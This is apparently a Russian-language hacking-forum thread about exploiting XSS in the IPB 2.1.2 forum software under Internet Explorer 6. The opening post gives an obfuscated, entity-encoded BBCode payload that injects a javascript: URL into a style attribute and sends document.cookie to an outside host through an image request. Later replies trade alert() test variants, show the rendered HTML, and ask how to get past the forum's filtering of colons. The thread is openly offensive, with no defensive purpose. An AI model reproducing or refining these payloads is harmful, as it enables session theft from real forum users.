![]() |
Вопрос про XSS на форуме IPB 2.1.2.
Вот пытаюсь вставить эту XSS:
Код HTML:
[post=1000[topic=target style=background&*#58;url(javascript*:document.image*s	*1;&#*49;].*src=*"*h*;*6;*16;&*#112*;*8;&#*47;&#*47;&#*97;&#*110;*t*;*05;&#*99;&*#104;*a**6;&#*46;&#*114;&*#117*;*7;	*9;*03;&*#105;*-*;b*;
*5;*10;&*#47;s.j&*#112;g?"+document.cookie); ] [/topic]]Код HTML:
[post=1000[topic=target style=background:url(javascript:alert()); ] [/topic]] |
каким браузером?
|
Ie 6.0
|
Попробуй таким макаром
Код HTML:
[topic=1000[post=aaa/ style=background:url(javascript:alert()); [/topic][/post] |
Не выходит, даже код не скрывает.
|
Насколько я поял, дело здесь в том, что форум не пропускает двоеточие :
Вот код поста после отсылки его на форум ( Без звездочки) Код HTML:
<div class="postcolor" style='padding:4px;'><a href='index.php?act=findpost&pid=1000<a href='index.php?showtopic=target style=background&*#58;url(java script:alert()); '> </a>'><br /><br /><br /></a></div> |
&*#58; естественно без звезды
|
Ну просто без звезды здесь &*#58; пробразуеться в двоеточие, а это уже не то, что было в коде поста, после отправки на форум.
Так есть ли другой код или способ обойти фильтрацию двоеточий? |
| Время: 22:38 |